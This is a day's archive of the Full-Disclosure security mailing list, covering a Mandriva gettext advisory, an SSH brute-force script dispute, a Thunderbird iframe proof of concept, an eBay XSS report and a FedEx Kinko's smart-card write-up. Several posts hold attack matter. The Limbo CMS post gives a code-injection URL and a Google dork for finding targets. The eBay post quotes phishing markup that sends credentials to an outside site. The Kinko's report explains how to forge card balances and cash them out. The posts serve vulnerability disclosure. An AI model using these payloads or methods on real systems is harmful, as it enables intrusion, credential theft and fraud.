you behind McAfee GroupShield barriers may not be getting the whole
conversation here if people can't even use words like i-frame in plain
text without being suppressed as a virus.

(remove the hyphen in i-frame throughout)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDKSA-2006:051 ] - Updated gettext packages fix temporary file vulnerabilities

2006-02-28 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:051
 http://www.mandriva.com/security/
 ___
 
 Package : gettext
 Date: February 28, 2006
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The Trustix developers discovered temporary file vulnerabilities in the
 autopoint and gettextize scripts, part of GNU gettext.  These scripts
 insecurely created temporary files which could allow a malicious user
 to overwrite another user's files via a symlink attack.
 
 The updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0966
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 3e90a65b63c6cef50ea2362b97d601af  
corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.i586.rpm
 88645a36cc137b6d15baff31df84bb5f  
corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.i586.rpm
 122cf7a4d0173cd80c3c6a388b76ec5a  
corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.i586.rpm
 d9e9d121c5833e80c9bbd642af24fb40  
corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.i586.rpm
 7aa6d70debb3c1814333fca662e23cac  
corporate/3.0/RPMS/libgettextmisc-0.13.1-1.3.C30mdk.i586.rpm
 cfe279f682d65f910505e069b911d7c7  
corporate/3.0/RPMS/libintl2-0.13.1-1.3.C30mdk.i586.rpm
 fc15df73311804bf0fd371fa9682c0c5  
corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c3648f970e7794014773ddedd68eaf91  
x86_64/corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.x86_64.rpm
 d876576394822262df7e2351775c1aaa  
x86_64/corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.x86_64.rpm
 af77cf6ee5a7d238ec122fbc4af7d353  
x86_64/corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.x86_64.rpm
 1173d049f6621cd8ff8d0396d24eb097  
x86_64/corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.x86_64.rpm
 f757f8a584bfc7ebd99d13a92415241b  
x86_64/corporate/3.0/RPMS/lib64gettextmisc-0.13.1-1.3.C30mdk.x86_64.rpm
 ecb7b9c26a607287c10f12bc70d5ffa9  
x86_64/corporate/3.0/RPMS/lib64intl2-0.13.1-1.3.C30mdk.x86_64.rpm
 fc15df73311804bf0fd371fa9682c0c5  
x86_64/corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 bf7a130a64632e27c4c0e35bcce1838d  
mnf/2.0/RPMS/gettext-0.13.1-1.3.M20mdk.i586.rpm
 26b569b31b5786eb3dc90c466ad42951  
mnf/2.0/RPMS/gettext-base-0.13.1-1.3.M20mdk.i586.rpm
 513319968508b7d6c22135aed2a4ebcf  
mnf/2.0/RPMS/gettext-devel-0.13.1-1.3.M20mdk.i586.rpm
 8ebc491dd574ec6e9624776b39adb08e  
mnf/2.0/RPMS/gettext-java-0.13.1-1.3.M20mdk.i586.rpm
 d7efcc35298ade62c0d21b75cec11d35  
mnf/2.0/RPMS/libgettextmisc-0.13.1-1.3.M20mdk.i586.rpm
 d0993ab7f263642207f1ae95f4861525  
mnf/2.0/RPMS/libintl2-0.13.1-1.3.M20mdk.i586.rpm
 76fec48911a57db5edad551ae40cb3d1  
mnf/2.0/SRPMS/gettext-0.13.1-1.3.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEBKdDmqjQ0CJFipgRAhZHAJ9pXeM/Z7BFLAZ1zymn5CDFGiDNjQCgyy01
o5an648yuWxgj8BfvaEBjws=
=aKl0
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit

2006-02-28 Thread Josh Berry
 On 2/28/06, GroundZero Security [EMAIL PROTECTED] wrote:
 you may be able to add a bogus ip (wow your l33t), but it wouldnt be of
 any use so...

 Uhh, no use? -s accepts a netmask as well as addresses, it's not just
add  a bogus ip, I can effectively kick your machine off the network.
 Apart from that the code looks very flimsy, I'll bet there's an
arbitrary  command execution in there somewhere.

 instead of beeing a smartass why dont you provide a better solution
 for the people who are annoyed by those bruteforce attacks?

 Why dont you parse the output of lastb -i, dumbass.

I guess it makes you feel bigger and better to be an @sshole on a public
mailing list but I don't think that anyone is impressed with the fact that
you aren't offering any better ideas; just name-calling and showing a low
maturity level.

Just wasted time, space, and email if you aren't going to provide a
solution or try and fix the script.

I could be wrong, but doesn't last/lastb show users have have logged
in/out.  Therefore it wouldn't necessarily catch brute-forcers (unless
they were actually successful)?

This guy was just trying to be helpful and demonstrate a way of blocking
(or attempting to block) brute-forcers.  You aren't providing any value,
just being a d!ck.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Renaud Lifchitz
Hello,

If you carefully look at the inline attachments, you will find this
(first proof of concept) :

htmlhead/headbody style=margin: 0px; padding: 0px; border:
0px;iframe src=http://www.sysdream.com; width=100% height=100%
frameborder=0 marginheight=0 marginwidth=0/iframe

The information disclosure doesn't come from the first iframe, but from
the second one. Indeed, the inline attachment basic.html itself
contains a iframe, which is not correctly filtered and makes Thunderbird
fetch any external resource.


Best regards,

Renaud Lifchitz
http://www.sysdream.com




Daniel Veditz wrote:

Renaud Lifchitz wrote:
  

Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities



We believe this to be a testing error. The problem of loading remote
iframe and css content was fixed prior to the release of Mozilla
Thunderbird 1.0

The testcase included in the advisory contains the iframe and css
content in-line with the message. That will always be shown as there is
no privacy issue with doing so and does not demonstrate the remote
loading issue claimed.

Once a user has pressed the Show Images button--not the best label
since it covers all remote content--that state is stored in the mailbox
metadata/index file (.msf) and the remote content will then be loaded on
future viewings. If the .msf file is not deleted between tests this
could give the appearance of the bug described in the advisory.

There is a minor residual privacy issue if people whose mail you keep
and reread are setting webbugs on you (your boss could find out how many
times you read his memo?), but in most cases your privacy is fully blown
once you load the remote content the first time.


  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit

2006-02-28 Thread Christian \Khark\ Lauf
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Ho,

Josh Berry wrote:

 I could be wrong, but doesn't last/lastb show users have have logged
 in/out.  Therefore it wouldn't necessarily catch brute-forcers (unless
 they were actually successful)?

Under Debian Sarge all failed/successfull logins and su-actions are
logged to /var/log/auth.log.
lastb isn't touched. Even if it exists.

Greetings,
  Christian Khark Lauf
- --
Christian Khark Lauf [EMAIL PROTECTED]
GPG: 0x6AADC60A | IRCnet/silcnyet: Khark
silcnyet-Fingerprint: 9424 E3BF B637 E1FC E355 BA7C 01CC 1B68 3A1C E330
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)

iD8DBQFEBNbjAaLWKGqtxgoRAocRAJwJBQS7op4/dFi34M2FRZoKlNQU7wCeOIsj
wRZHckIfnVlE3IpsZLVtNFE=
=ngQH
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit

2006-02-28 Thread Christian \Khark\ Lauf
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Sorry, I meant:

Under Debian Sarge all failed/successfull logins and su-actions are
logged to /var/log/auth.log.
/var/log/btmp isn't touched. Even if it exists.

Christian
- --
Christian Khark Lauf [EMAIL PROTECTED]
GPG: 0x6AADC60A | IRCnet/silcnyet: Khark
silcnyet-Fingerprint: 9424 E3BF B637 E1FC E355 BA7C 01CC 1B68 3A1C E330
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)

iD4DBQFEBNflAaLWKGqtxgoRAvLGAJjnH8S5okCLG0Aw5ZzPMJwMVtSxAJ0VMqaA
O1ZFevDd2POfVRGRizDMWQ==
=botY
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Limbo CMS code execution

2006-02-28 Thread Alexander Hristov
Official page : http://www.limbo-cms.com/

Vulnerable : Limbo 1.*

Fix : No

Bug : 
http://somehost/path-to-limbo/index.php?option=frontpageItemid=system(CODE)

example : index.php?option=frontpageItemid=system(uname)

Google search string : inurl:option=frontpage

--
Best Regards,
Aleksander Hristov  root at securitydot.net   http://securitydot.net 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Daniel Veditz wrote:
 Renaud Lifchitz wrote:
 Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
 
 We believe this to be a testing error.

I responded too soon. This is indeed a problem in the current release
version of Thunderbird 1.5
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Ebay XSS

2006-02-28 Thread Aaron Horst
The linked auction demonstrates an XSS flaw within ebay:

http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

The affected code is below the line On Feb-28-06 at 16:31:39 PST,
seller added the following information:

form name=xxx
action=http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html;
/form
script
xxx.submit();
/script

The redirection page seems to be simple spoofing, and emails the data
to [EMAIL PROTECTED]

AnthraX101

--
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread nodialtone
On Tue, 2006-02-28 at 21:35, Daniel Veditz wrote:
 Daniel Veditz wrote:
  Renaud Lifchitz wrote:
  Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
  
  We believe this to be a testing error.
 
 I responded too soon. This is indeed a problem in the current release
 version of Thunderbird 1.5
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

I think mozilla has released a fix for this.  Or is this something new?

-- 
Unique Security Forums at:
http://www.iatechconsulting.com
Public key: http://www.iatechconsulting.com/dl/nodialtone.asc





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Fedex Kinkos Smart Card Authentication Bypass

2006-02-28 Thread Lance James
Eric B wrote:
 Wait, so if I read this right, consumers with existing cards could
 dupe their legit cards for fake ones and cash in the fake ones yet
 still have credit on the legit card?

 So I'm assuming Fedex has no database/authentication system storing
 these serials...brilliant.


Yup.

According to Fedex Kinko's:
Our analysis shows that the information in the article is inaccurate
and not based on the way the actual technology and security function.
Security is a priority to FedEx Kinko's, and we are confident in the
security of our network in preventing such illegal activity.

Our response:

http://ip.securescience.net/exploits/P1010029.JPG


 Good write-up, thanks!

 On 2/28/06, *Lance James* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 Abstract:
 -
 The ExpressPay stored-value card system used by FedEx Kinko's is
 vulnerable to attack.  An attacker who gains the ability to alter the
 data stored on the card can use FedEx Kinko's services fraudulently
 and anonymously, and can even obtain cash from the store.


 Description:
 
 The FedEx Kinko's ExpressPay system, developed by enTrac Technologies
 of Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory
 chip card.  The data stored on this card is freely rewritable once a
 three-byte security code has been presented to the card's security
 logic.  Neither this security code nor the data stored on the card is
 encrypted; anyone able to obtain the security code is free to rewrite
 the data stored on the card using an inexpensive commercially
 available smart card reader/writer.

 The first thirty-two bytes of the memory chip card are writable and
 subsequently permanently write-protectable (in this application,
 these
 bytes are write-protected), and contain a header which identifies the
 card as an ExpressPay stored-value card.  Bytes 0x20 through 0x27
 contain the value stored on the card, represented in IEEE 754
 double-precision floating point format.  Bytes 0x60 through 0x6A
 contain the card's eleven-digit serial number stored as unsigned
 zoned-decimal ASCII; digits 0x60 through 0x63 are the store number the
 card was initially issued at, and the remaining seven digits are
 assigned sequentially at the moment of first issue.  A timestamp
 indicating date and time of issue are located from 0x30 through 0x37,
 and is repeated from 0xC7 through 0xCE.

 In order to write to the card, a three-byte security code must be
 presented in a specific sequence of commands as outlined by the
 SLE4442's white paper.  By soldering wires to the contact points of
 the card and then connecting those wires to an inexpensive logic
 analyzer, an attacker can sniff the three-byte code as the kiosk or a
 card terminal prepares to write data to the card.  This security code
 appears to be the same across all FedEx Kinko's ExpressPay cards
 currently in circulation.

 Once the three-byte code is known to the attacker, the card's stored
 value and serial number can be changed to any value.  The ExpressPay
 system appears to implicitly trust the value stored on the card,
 regardless of what that value actually is.  The system will also
 accept cards with obviously fake serial numbers (e.g. a non-existent
 store number followed by all nines).  Using these altered cards,
 xeroxes can be made from any machine with a card reader, and computers
 can be rented anonymously and indefinitely.  Most disturbing, however,
 is that since stored-value cards can be cashed out by an employee at
 the register at any time, an attacker could cash out altered cards
 obtained at little or no monetary cost.  If a card is cashed out, its
 serial number does not appear to be invalidated in the system.  If an
 attacker were to clone a known good card and cash it out, the clone
 would still be usable.


 Tested Vendors:
 ---
 - FedEx Kinko's


 Suspected Vendors:
 --
 - Any client of enTrac Technologies who uses the ExpressPay
 stored-value card system.
 - Any company which uses a stored-value card system based on the
 SLE4442


 Vendor and Patch Information:
 -
 Proof-of-concept of the initial security vulnerability was
 achieved on
 8 February 2006, with research into the ramifications continuing
 through 12 February.  Copies of this report were sent to both FedEx
 Kinko's and enTrac Technologies on 15 February; a read receipt was
 returned from enTrac on 19 February, while no receipt has yet been
 received from FedEx Kinko's.


 Solution:
 -
 - Encrypt data before storing it on the SLE4442 card, or migrate to a
 system which uses cards which have built-in encryption functionality.
 - Verify that the 

[Full-disclosure] Re: Fedex Kinkos Smart Card Authentication Bypass

2006-02-28 Thread Eric B
Wait, so if I read this right, consumers with existing cards could dupe their legit cards for fake ones and cash in the fake ones yet still have credit on the legit card?So I'm assuming Fedex has no database/authentication system storing these serials...brilliant.
Good write-up, thanks!On 2/28/06, Lance James [EMAIL PROTECTED] wrote:
Abstract:-The ExpressPay stored-value card system used by FedEx Kinko's isvulnerable to attack.An attacker who gains the ability to alter thedata stored on the card can use FedEx Kinko's services fraudulently
and anonymously, and can even obtain cash from the store.Description:The FedEx Kinko's ExpressPay system, developed by enTrac Technologiesof Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory
chip card.The data stored on this card is freely rewritable once athree-byte security code has been presented to the card's securitylogic.Neither this security code nor the data stored on the card isencrypted; anyone able to obtain the security code is free to rewrite
the data stored on the card using an inexpensive commerciallyavailable smart card reader/writer.The first thirty-two bytes of the memory chip card are writable andsubsequently permanently write-protectable (in this application, these
bytes are write-protected), and contain a header which identifies thecard as an ExpressPay stored-value card.Bytes 0x20 through 0x27contain the value stored on the card, represented in IEEE 754double-precision floating point format.Bytes 0x60 through 0x6A
contain the card's eleven-digit serial number stored as unsignedzoned-decimal ASCII; digits 0x60 through 0x63 are the store number thecard was initially issued at, and the remaining seven digits areassigned sequentially at the moment of first issue.A timestamp
indicating date and time of issue are located from 0x30 through 0x37,and is repeated from 0xC7 through 0xCE.In order to write to the card, a three-byte security code must bepresented in a specific sequence of commands as outlined by the
SLE4442's white paper.By soldering wires to the contact points ofthe card and then connecting those wires to an inexpensive logicanalyzer, an attacker can sniff the three-byte code as the kiosk or acard terminal prepares to write data to the card.This security code
appears to be the same across all FedEx Kinko's ExpressPay cardscurrently in circulation.Once the three-byte code is known to the attacker, the card's storedvalue and serial number can be changed to any value.The ExpressPay
system appears to implicitly trust the value stored on the card,regardless of what that value actually is.The system will alsoaccept cards with obviously fake serial numbers (e.g. a non-existentstore number followed by all nines).Using these altered cards,
xeroxes can be made from any machine with a card reader, and computerscan be rented anonymously and indefinitely.Most disturbing, however,is that since stored-value cards can be cashed out by an employee at
the register at any time, an attacker could cash out altered cardsobtained at little or no monetary cost.If a card is cashed out, itsserial number does not appear to be invalidated in the system.If anattacker were to clone a known good card and cash it out, the clone
would still be usable.Tested Vendors: FedEx Kinko'sSuspected Vendors:--- Any client of enTrac Technologies who uses the ExpressPaystored-value card system.
- Any company which uses a stored-value card system based on the SLE4442Vendor and Patch Information:-Proof-of-concept of the initial security vulnerability was achieved on
8 February 2006, with research into the ramifications continuingthrough 12 February.Copies of this report were sent to both FedExKinko's and enTrac Technologies on 15 February; a read receipt wasreturned from enTrac on 19 February, while no receipt has yet been
received from FedEx Kinko's.Solution:-- Encrypt data before storing it on the SLE4442 card, or migrate to asystem which uses cards which have built-in encryption functionality.- Verify that the stored value on the card does not significantly
differ from a reference value stored in a database.- Do not allow the use of cards with invalid serial numbers.- Invalidate serial numbers of cards that are cashed out.Credits:Strom Carlson, Secure Science Corporation: Hardware Security Division
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Steve Shockley

Renaud Lifchitz wrote:

Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities


The css part of this exploit is actively used by Intellicontact (or 
whatever they call themselves this week), the host of the factcheck.org 
mailing list.  For example:


LINK href=http://mail1.icptrack.com/track/relay.php?r=###msgid=
=###act=admin=0destination=http://www.factcheck.org/styles/subpage_nn.css 
type=text/css rel=stylesheet


To work around this, set:

user_pref(mailnews.display.html_as, 3);

and

user_pref(mailnews.display.html_sanitizer.allowed_tags, html head 
title body p br div(lang,title) h1 h2 h3 h4 h5 h6 ul(type,compact) 
ol(type,compact,start) li(type,value) dl dt dd blockquote(type,cite) pre 
noscript noframes strong em sub sup span(lang,title) acronym(title) 
abbr(title) del(title,cite,datetime) ins(title,cite,datetime) q(cite) 
a(href,name,title) base(href) area(alt) applet(alt) object(alt) var samp 
dfn address kbd code cite s strike tt b i table(align) caption 
tr(align,valign) td(rowspan,colspan,align,valign) 
th(rowspan,colspan,align,valign));

(one line)

in prefs.js.

works around the css problem because link isn't an allowed html tag.  I 
didn't test your iframe version, but I suspect this will work around 
that as well.


Reference: http://www.bucksch.com/1/projects/mozilla/108153/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit

2006-02-28 Thread Gary Leons
On 2/28/06, Josh Berry [EMAIL PROTECTED] wrote:

 I guess it makes you feel bigger and better to be an @sshole on a public
 mailing list but I don't think that anyone is impressed with the fact that
 you aren't offering any better ideas; just name-calling and showing a low
 maturity level.


I'm not trying to impress you, i'm trying to make sure anyone who uses
this script is aware of the security implications of doing so, this
list is called FULL-DISCLOSURE, which is exactly what i'm doing.


 I could be wrong, but doesn't last/lastb show users have have logged
 in/out.  Therefore it wouldn't necessarily catch brute-forcers (unless
 they were actually successful)?

Yes you could be wrong, how long would it have taken to type man lastb
and check? it lists failed login attempts, which is exactly what you
want.


 This guy was just trying to be helpful and demonstrate a way of blocking
 (or attempting to block) brute-forcers.  You aren't providing any value,
 just being a d!ck.

Are you on the correct mailing list? this list is for the disclosure
of security vulnerabilities, I think adding arbitrary firewall rules
to someone elses machine is a security issue worthy of disclosure by
anyone's standards.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/